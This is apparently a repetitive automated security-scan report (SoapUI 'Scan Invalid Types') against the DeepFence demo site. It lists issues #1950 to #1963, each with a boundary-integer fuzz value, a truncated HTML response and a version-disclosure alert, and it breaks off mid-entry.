<!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1950Scan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-1267896799\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1951\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-882223334991111111\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1952\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-2147483647\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1953\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-32768\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1954\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io127\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1955\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1956\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1957\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.Issue Number #1958\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1267896799\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1959\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io882223334991111111\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1960\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io294967295\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1961\nScan Invalid Types\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io65535\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1962\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io255\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1963\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSoapUI is the best\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 